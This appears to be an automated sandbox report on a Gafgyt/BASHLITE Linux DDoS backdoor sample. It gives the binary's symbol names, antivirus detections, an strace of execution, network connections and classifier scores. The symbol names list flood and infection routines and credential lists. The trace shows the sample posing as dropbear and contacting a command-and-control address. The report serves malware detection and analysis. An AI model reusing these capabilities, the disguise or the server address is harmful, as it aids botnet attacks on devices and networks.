__uClibc_fini, , memrchr, , geteuid, , inet_pton, , __GI_vsnprintf, , __GI_setsid, , memmove, , sendTCP, , __bsd_signal, , __GI_strpbrk, , __stdio_trans2r_o, , munmap, , __GI_setsockopt, , __libc_stack_end, , __GI_fclose, , __GI_wcsnrtombs, , __GI_pipe, , _uintmaxtostr, , __libc_fcntl, , atol, , _h_errno, , getRandomPublicIP, , getc_unlocked, , __ctype_b, , __GI_random_r, , usernames, , errno, , getegid, , __GI_sbrk, , zprintf, , __GI___uClibc_init, , execve, , getpagesize, , getpid, , __GI_lseek64, , setstate_r, , fgets, , getHost, , __libc_getpid, , wildString, , __xpg_strerror_r, , fcntl64, , prctl, , memcpy, , makeRandomStr, , getRandomIP, , __GI_fputs_unlocked, , execl, , __GI_fgets, , sendHTTP, , creat, , _stdio_openlist_dec_use, , sclose, , __libc_select, , _ppfs_init, , __GI___C_ctype_toupper, , __GI_fgetc_unlocked, , __libc_nanosleep, , trim, , __GI_fgets_unlocked, , dup2, , __pthread_mutex_init, , tolower, , getuid, , system, , __open_etc_hosts, , malloc, , isatty, , sleep, , __GI_atol, , vsnprintf, , __dns_lookup, , __GI_read, , uastrings, , __C_ctype_tolower, , random_r, , __dso_handle, , clock_getres, , gethostbyname_r, , tcpcsum, , fdpclose, , socket, , __GI_dup2, , select, , _pthread_cleanup_pop_restore, , __GI_wcrtomb, , __GI___libc_fcntl, , __GI_memset, , isspace, , __stdio_seek, , mempcpy, , __GI_strcoll, , __GI_write, , __ctype_toupper, , __libc_read, , _string_syserrmsgs, , __GI_open, , __GI_strchr, , __searchdomain, , sigaddset, , __GI_tcgetattr, , __environ, , mmap, , wcsnrtombs, , makeIPPacket, , sockprintf, , __GI_inet_ntoa, , send, , __fgetc_unlocked, , abort, , __GI_fcntl, , __GI_wcsrtombs, , __GI_fwrite_unlocked, , __GI_getgid, , srandom_r, , _init, , __GI_inet_ntoa_r, , __GI_setstate_r, , parseHex, , strtol, , pipe, , __libc_lseek64, , strnlen, , rawmemchr, , __GI_mempcpy, , __malloc_state, , __GI___C_ctype_b_data, , __sigaddset, , nanosleep, , __GI_send, , h_errno, , __pthread_mutex_unlock, , wait4, , __register_frame_info_bases, , __GI_exit, , __app_fini, , csum, , __exit_cleanup, , __GI_execl, , __GI_srandom_r, , __GI___ctype_tolower, , write, , environ, , __GI_close, , getBuild, , __resolv_lock, , kill, , fputs_unlocked, , __pthread_mutex_trylock, , __GI_brk, , __GI_nanosleep, , __GI_strtok, , _stdio_openlist, , __GI_sigprocmask, , inet_addr, , ntohl, , __GI_fseek, , ourIP, , chdir, , fseeko, , _stdio_openlist_del_count, , connectTimeout, , __raise, , setsockopt, , bsd_signal, , fseek, , __GI_kill, , __GI_strcmp, , __GI_memmove, , sendSTD, , setstate, , __decode_dotted, , __stdio_READ, , memchr, , __GI_toupper, , __pthread_initialize_minimal, , __GI_recv, , __stdin, , stdin, , __GI_isatty, , _start, , __deregister_frame_info_bases, , strstr, , __GI_ioctl, , init_rand, , rand, , signal, , read, , __decode_header, , getCores, , __GI___h_errno_location, , __GI_memcpy, , strcoll, , wcsrtombs, , _stdio_user_locking, , strncpy, , strcasecmp, , htonl, , sendto, , __C_ctype_toupper, , StartTheLelz, , __GI___C_ctype_b, , __GI_gethostbyname_r, , __GI_strncpy, , __libc_send, , __GI___xpg_strerror_r, , currentServer, , __GI___C_ctype_tolower, , __GI_getrlimit, , bcopy, , __GI_strcpy, , __GI_inet_ntop, , strtok, , __stdio_adjust_position, , malloc_trim, , __GI_poll, , _vfprintf_internal, , fork, , __stdio_rfill, , strncat, , gotIP, , __GI_sleep, , sigaction, , __GI_gethostbyname, , _dl_phdr, , __GI_getc_unlocked, , __GI___libc_fcntl64, , __uClibc_init, , __GI_munmap, , _store_inttype, , __length_dotted, , __getpagesize, , __GI_random, , __syscall_error, , __uclibc_progname, , __GI_getegid, , __GI_wait4, , __malloc_lock, , __uClibc_main, , sbrk, , __rtld_fini, , __GI_fork, , strdup, , __libc_close, , __GI_getpid, , inet_aton, , index, , _pthread_cleanup_push_defer, , processCmd, , __sigismember, , fopen, , __bss_start, , __libc_open, , getOurIP, , memset, , __GI_socket, , main, , __glibc_strerror_r, , listFork, , __GI___C_ctype_tolower_data, , __stdio_fwrite, , negotiate, , srand, , initstate, , fclose, , __syscall_rt_sigaction, , ntohs, , sendUDP, , inet_ntoa, , tcgetattr, , __C_ctype_tolower_data, , time, , __libc_system, , __GI_abort, , poll, , fdpopen, , __get_hosts_byname_r, , __stdio_init_mutex, , __GI__exit, , strcmp, , __nameserver, , data_start, , __GI_sysconf, , __h_errno_location, , matchPrompt, , __C_ctype_b_data, , __GI_inet_pton, , gethostbyname, , _stdio_fopen, , _fini, , __GI_chdir, , __vfork, , __GI_mmap, , sprintf, , fdgets, , __get_pc_thunk_bx, , strerror_r, , __GI_select, , __libc_waitpid, , socket_connect, , __GI_waitpid, , _stdio_term, , __GI_vfprintf, , __decode_answer, , __GI_signal, , stderr, , commServer, , vfork, , __C_ctype_b, , srandom, , _ppfs_setargs, , __GI_sendto, , __GI_sigemptyset, , __GI_printf, , __libc_fork, , __atexit_lock, , scanPid, , rand_cmwc, , __libc_fcntl64, , getsockopt, , __GI_fseeko64, , fflush_unlocked, , __stdio_wcommit, , __GI___fgetc_unlocked, , __nameservers, , fwrite_unlocked, , inet_ntoa_r, , __pagesize, , _stdio_openlist_add_lock, , __GI_getdtablesize, , _edata, , __stdout, , __GI_memrchr, , __GI_fflush_unlocked, , __GI_strstr, , __searchdomains, , _end, , htons, , _sigintr, , _ppfs_prepargs, , __GI_strspn, , fgetc_unlocked, , initstate_r, , __GI_connect, , __curbrk, , __libc_poll, , _dl_phnum, , _fpmaxtostr, , __errno_location, , uppercase, , _stdlib_strto_l, , __GI___libc_open, , exit, , __stdio_WRITE, , _stdio_init, , __GI_geteuid, , inet_ntop, , brk, , __C_ctype_toupper_data, , _dl_aux_init, , sendJUNK, , _errno, , atoi, , _stdio_openlist_del_lock, , __GI_inet_aton, , fgets_unlocked, , _exit, , szprintf, , strspn, , __libc_recv, , __libc_creat, , strlen, , lseek64, , open, , toupper, , __libc_write, , __malloc_consolidate, , _ppfs_parsespec, , __GI_strtol, , __GI_getuid, , __GI_strtok_r, , __GI_errno, , __libc_sendto, , __stdio_trans2w_o, , __GI_vfork, , strchr, , __GI_rawmemchr, , __GI_raise, , __data_start, , setsid, , __GI_inet_addr, , __encode_dotted, , __GI_strnlen, , _Jv_RegisterClasses, , infectline, , macAddress, , __GI___errno_location, , readUntil, , fcntl, , __GI_atoi, , fseeko64, , __GI_sprintf, , __ctype_tolower, , wcrtomb, , __GI_getsockname, , close, , __libc_connect, , passwords, , __GI_strlen, , sendHOLD, , mainCommSock, , pids, , sendCNC, , vfprintf, , strpbrk, , getBogos, , _load_inttype, , raise, , free, , sigprocmask, , getsockname,
Present
True check_circle
Anti-Debug
Ptrace
False cancel
Anti-disasm
False cancel
Entry Point
Address
0x8048168
Suspicious
False cancel
Embedded ELF
List
None
Identified
0
Program Header
Size
32
Number
3
Offset
52
Section Header
Size
40
Number
16
Offset
73912
AVclass
gafgyt
1
VirusTotal
md5
a6b402a0046c6576b9f6256a69173fe1
sha1
3994150b50d6fb9369576cbf30ae7ce50de8df02
SCANS (DETECTION RATE = 64.41%)
AVG
result: ELF:DDoS-Y [Trj]
update: 20190426
version: 18.4.3895.0
detected: True check_circle

CMC
update: 20190321
version: 1.1.0.977
detected: False cancel

MAX
result: malware (ai score=100)
update: 20190426
version: 2018.9.12.1
detected: True check_circle

Bkav
update: 20190425
version: 1.3.0.9899
detected: False cancel

K7GW
update: 20190426
version: 11.40.30717
detected: False cancel

ALYac
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20190426
version: 1.1.1.5
detected: True check_circle

Avast
result: ELF:DDoS-Y [Trj]
update: 20190426
version: 18.4.3895.0
detected: True check_circle

Avira
result: LINUX/Gafgyt.quwkf
update: 20190425
version: 8.3.3.8
detected: True check_circle

Baidu
update: 20190318
version: 1.0.0.2
detected: False cancel

Cyren
update: 20190426
version: 6.2.0.1
detected: False cancel

DrWeb
result: Linux.BackDoor.Fgt.373
update: 20190426
version: 7.0.34.11020
detected: True check_circle

GData
result: Linux.Trojan.Gafgyt.A
update: 20190426
version: A:25.21682B:25.14938
detected: True check_circle

Panda
update: 20190425
version: 4.6.4.2
detected: False cancel

VBA32
update: 20190425
version: 4.0.0
detected: False cancel

Zoner
update: 20190425
version: 1.0
detected: False cancel

ClamAV
result: Unix.Trojan.Mirai-5607483-0
update: 20190425
version: 0.101.2.0
detected: True check_circle

Comodo
result: Malware@#22jqy9nw4gy2i
update: 20190426
version: 30773
detected: True check_circle

F-Prot
update: 20190426
version: 4.7.1.166
detected: False cancel

Ikarus
result: Trojan.Linux.Tsunami
update: 20190425
version: 0.1.5.2
detected: True check_circle

McAfee
result: RDN/Generic BackDoor
update: 20190426
version: 6.0.6.653
detected: True check_circle

Rising
result: Backdoor.Gafgyt/Linux!1.A512 (CLASSIC)
update: 20190426
version: 25.0.0.24
detected: True check_circle

Sophos
result: Linux/DDoS-BI
update: 20190426
version: 4.98.0
detected: True check_circle

Yandex
update: 20190425
version: 5.5.1.3
detected: False cancel

Zillya
result: Backdoor.Gafgyt.Linux.9967
update: 20190424
version: 2.0.0.3803
detected: True check_circle

Arcabit
result: Trojan.Backdoor.Linux.Gafgyt.1
update: 20190426
version: 1.0.0.845
detected: True check_circle

Babable
update: 20190424
version: 9107201
detected: False cancel

FireEye
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20190426
version: 29.7.0.0
detected: True check_circle

TACHYON
update: 20190426
version: 2019-04-26.02
detected: False cancel

Tencent
result: backdoor.linux.gafgyt.y
update: 20190426
version: 1.0.0.1
detected: True check_circle

ViRobot
update: 20190426
version: 2014.3.20.0
detected: False cancel

Ad-Aware
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20190426
version: 3.0.5.370
detected: True check_circle

AegisLab
result: Trojan.Linux.Generic.m!c
update: 20190426
version: 4.2
detected: True check_circle

Emsisoft
result: Gen:Variant.Backdoor.Linux.Gafgyt.1 (B)
update: 20190426
version: 2018.4.0.1029
detected: True check_circle

F-Secure
result: Malware.LINUX/Gafgyt.quwkf
update: 20190425
version: 12.0.86.52
detected: True check_circle

Fortinet
result: ELF/Gafgyt.BJ!tr
update: 20190426
version: 5.4.247.0
detected: True check_circle

Jiangmin
result: Backdoor.Linux.xna
update: 20190426
version: 16.0.100
detected: True check_circle

Kingsoft
update: 20190426
version: 2013.8.14.323
detected: False cancel

AhnLab-V3
result: Linux/Gafgyt.Gen
update: 20190426
version: 3.15.0.23609
detected: True check_circle

Antiy-AVL
result: Trojan[Backdoor]/Linux.Gafgyt.af
update: 20190425
version: 3.0.0.1
detected: True check_circle

Kaspersky
result: HEUR:Backdoor.Linux.Gafgyt.af
update: 20190426
version: 15.0.1.13
detected: True check_circle

MaxSecure
update: 20190426
version: 1.0.0.1
detected: False cancel

Microsoft
result: DDoS:Linux/Lightaidra
update: 20190425
version: 1.1.15900.4
detected: True check_circle

Qihoo-360
result: Win32/Backdoor.3e0
update: 20190426
version: 1.0.0.1120
detected: True check_circle

TheHacker
update: 20190421
version: 6.8.0.5.4174
detected: False cancel

ZoneAlarm
result: HEUR:Backdoor.Linux.Gafgyt.af
update: 20190426
version: 1.0
detected: True check_circle

ESET-NOD32
result: a variant of Linux/Gafgyt.C
update: 20190426
version: 19256
detected: True check_circle

TrendMicro
result: Backdoor.Linux.BASHLITE.SMJC
update: 20190426
version: 10.0.0.1040
detected: True check_circle

BitDefender
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20190426
version: 7.2
detected: True check_circle

K7AntiVirus
update: 20190426
version: 11.40.30717
detected: False cancel

SentinelOne
result: DFI - Malicious ELF
update: 20190420
version: 1.0.25.316
detected: True check_circle

Avast-Mobile
result: ELF:DDoS-S [Trj]
update: 20190425
version: 190425-02
detected: True check_circle

Malwarebytes
update: 20190426
version: 2.1.1.1115
detected: False cancel

TotalDefense
update: 20190426
version: 37.1.62.1
detected: False cancel

CAT-QuickHeal
update: 20190425
version: 14.00
detected: False cancel

NANO-Antivirus
result: Trojan.Elf32.Gafgyt.eikqfj
update: 20190426
version: 1.0.134.24788
detected: True check_circle

MicroWorld-eScan
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20190426
version: 14.0.297.0
detected: True check_circle

SUPERAntiSpyware
update: 20190423
version: 5.6.0.1032
detected: False cancel

McAfee-GW-Edition
result: RDN/Generic BackDoor
update: 20190426
version: v2017.3010
detected: True check_circle

TrendMicro-HouseCall
result: Backdoor.Linux.BASHLITE.SMJC
update: 20190426
version: 10.0.0.1040
detected: True check_circle

total
59
sha256
4cffb742e51297c5b5d1c6f785c7125bad60259921e60847ec3246cfeb615410
scan_id
4cffb742e51297c5b5d1c6f785c7125bad60259921e60847ec3246cfeb615410-1556259687
resource
a6b402a0046c6576b9f6256a69173fe1
positives
38
scan_date
2019-04-26 06:21:27
verbose_msg
Scan finished, information embedded
response_code
1
Ltrace
Trace

Strace
Trace
4291execve"./malware"["./malware"][/* 15 vars */] 0
4291ioctl0TCGETS0xfffc0e90) = -1 ENOTTY (Inappropriate ioctl for device -1 ENOTTY (Inappropriate ioctl for device)
4291ioctl1TCGETS0xfffc0e90) = -1 ENOTTY (Inappropriate ioctl for device -1 ENOTTY (Inappropriate ioctl for device)
4291prctlPR_SET_NAME"/usr/sbin/dropbe" 0
4291timeNULL 1571351692
4291getpid 4291
4291timeNULL 1571351692
4291getpid 4291
4291socketPF_INETSOCK_DGRAMIPPROTO_IP 3
4291connect3{sa_family=AF_INET, {sa_family=AF_INET, sin_port=htons(53), sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}sin_addr=inet_addr("8.8.8.8")}16 0
4291getsockname3{sa_family=AF_INET, {sa_family=AF_INET, sin_port=htons(54082), sin_port=htons(54082), sin_addr=inet_addr("192.168.122.147")}sin_addr=inet_addr("192.168.122.147")}[16] 0
4291open"/proc/net/route"O_RDONLY 4
4291read4"I"1 1
4291read4"f"1 1
4291read4"a"1 1
4291read4"c"1 1
4291read4"e"1 1
4291read4"\t"1 1
4291read4"D"1 1
4291read4"e"1 1
4291read4"s"1 1
4291read4"t"1 1
4291read4"i"1 1
4291read4"n"1 1
4291read4"a"1 1
4291read4"t"1 1
4291read4"i"1 1
4291read4"o"1 1
4291read4"n"1 1
4291read4"\t"1 1
4291read4"G"1 1
4291read4"a"1 1
4291read4"t"1 1
4291read4"e"1 1
4291read4"w"1 1
4291read4"a"1 1
4291read4"y"1 1
4291read4" "1 1
4291read4"\t"1 1
4291read4"F"1 1
4291read4"l"1 1
4291read4"a"1 1
4291read4"g"1 1
4291read4"s"1 1
4291read4"\t"1 1
4291read4"R"1 1
4291read4"e"1 1
4291read4"f"1 1
4291read4"C"1 1
4291read4"n"1 1
4291read4"t"1 1
4291read4"\t"1 1
4291read4"U"1 1
4291read4"s"1 1
4291read4"e"1 1
4291read4"\t"1 1
4291read4"M"1 1
4291read4"e"1 1
4291read4"t"1 1
4291read4"r"1 1
4291read4"i"1 1
4291read4"c"1 1
4291read4"\t"1 1
4291read4"M"1 1
4291read4"a"1 1
4291read4"s"1 1
4291read4"k"1 1
4291read4"\t"1 1
4291read4"\t"1 1
4291read4"M"1 1
4291read4"T"1 1
4291read4"U"1 1
4291read4"\t"1 1
4291read4"W"1 1
4291read4"i"1 1
4291read4"n"1 1
4291read4"d"1 1
4291read4"o"1 1
4291read4"w"1 1
4291read4"\t"1 1
4291read4"I"1 1
4291read4"R"1 1
4291read4"T"1 1
4291read4"T"1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4"\n"1 1
4291read4"e"1 1
4291read4"n"1 1
4291read4"s"1 1
4291read4"3"1 1
4291read4"\t"1 1
4291read4"0"1 1
4291read4"0"1 1
4291read4"0"1 1
4291read4"0"1 1
4291read4"0"1 1
4291read4"0"1 1
4291read4"0"1 1
4291read4"0"1 1
4291read4"\t"1 1
4291read4"0"1 1
4291read4"1"1 1
4291read4"7"1 1
4291read4"A"1 1
4291read4"A"1 1
4291read4"8"1 1
4291read4"C"1 1
4291read4"0"1 1
4291read4"\t"1 1
4291read4"0"1 1
4291read4"0"1 1
4291read4"0"1 1
4291read4"3"1 1
4291read4"\t"1 1
4291read4"0"1 1
4291read4"\t"1 1
4291read4"0"1 1
4291read4"\t"1 1
4291read4"1"1 1
4291read4"0"1 1
4291read4"0"1 1
4291read4"\t"1 1
4291read4"0"1 1
4291read4"0"1 1
4291read4"0"1 1
4291read4"0"1 1
4291read4"0"1 1
4291read4"0"1 1
4291read4"0"1 1
4291read4"0"1 1
4291read4"\t"1 1
4291read4"0"1 1
4291read4"\t"1 1
4291read4"0"1 1
4291read4"\t"1 1
4291read4"0"1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4" "1 1
4291read4"\n"1 1
4291close4 0
4291ioctl3SIOCGIFHWADDR{ifr_name="ens3", {ifr_name="ens3", ifr_hwaddr=52:54:00:94:44:aa}ifr_hwaddr=52:54:00:94:44:aa} 0
4291close3 0
4291fork 4292
4291wait442924291 wait4(4292,
4292fork 4293
4292write1"BUILD RAZER\n"12 12
4292exit0 ?
4291[{WIFEXITEDs) && WEXITSTATUS(s) == 0}]0NULL 4292
4291---4291 --- SIGCHLD {si_signo=SIGCHLDsi_code=CLD_EXITEDsi_pid=4292si_uid=1000si_status=0si_utime=0si_stime=0} --0} ---
4291write1"BUILD RAZER\n"12 12
4291exit0 ?
4293setsid 4293
4293chdir"/" 0
4293rt_sigactionSIGPIPE{SIG_IGN, {SIG_IGN, [PIPE], [PIPE]SA_RESTORER|SA_RESTART0x805208f}{SIG_DFL, {SIG_DFL, [], []0}8 0
4293socketPF_INETSOCK_STREAMIPPROTO_IP 3
4293fcntl3F_GETFL) = 0x2 (flags O_RDWR 0x2 (flags O_RDWR)
4293fcntl3F_SETFLO_RDWR|O_NONBLOCK 0
4293connect3{sa_family=AF_INET, {sa_family=AF_INET, sin_port=htons(444), sin_port=htons(444), sin_addr=inet_addr("185.165.29.47")}sin_addr=inet_addr("185.165.29.47")}16) = -1 EINPROGRESS (Operation now in progress -1 EINPROGRESS (Operation now in progress)
4293_newselect4NULL[3]NULL 0 (Timeout)
4293rt_sigprocmaskSIG_BLOCK[CHLD][]8 0
4293rt_sigactionSIGCHLDNULL{SIG_DFL, {SIG_DFL, [], []0}8 0
4293rt_sigprocmaskSIG_SETMASK[]NULL8 0
4293nanosleep{5,{5, 1571351692}1571351692}0xfffbfa14 0
4293close3 0
4293socketPF_INETSOCK_STREAMIPPROTO_IP 3
4293fcntl3F_GETFL) = 0x2 (flags O_RDWR 0x2 (flags O_RDWR)
4293fcntl3F_SETFLO_RDWR|O_NONBLOCK 0
4293connect3{sa_family=AF_INET, {sa_family=AF_INET, sin_port=htons(444), sin_port=htons(444), sin_addr=inet_addr("185.165.29.47")}sin_addr=inet_addr("185.165.29.47")}16) = -1 EINPROGRESS (Operation now in progress -1 EINPROGRESS (Operation now in progress)
4293_newselect4NULL[3]NULL4293 _newselect(4, NULL, [3], NULL, {30, 8}

Analysis
Ltrace
Statically-compiled samples cannot be ltraced.

Reason
Timeout

Status
Sucess

Strace
Success

Results
True check_circle

DNS
Query

Response

TCP
Info
computer localhost:57472 arrow_forward help_outline 185.165.29.47:444
computer localhost:57470 arrow_forward help_outline 185.165.29.47:444

UDP
Info
computer localhost:5353 arrow_forward help_outline 224.0.0.251:5353

HTTP
Info

Summary
DNS
False cancel

TCP
True check_circle

UDP
True check_circle

HTTP
False cancel

Binary
RF
confidence: 100.00%
suspicious: True check_circle
MLP
confidence: 99.98%
suspicious: True check_circle
SVM
confidence: 98.80%
suspicious: True check_circle
Add to Collection
Download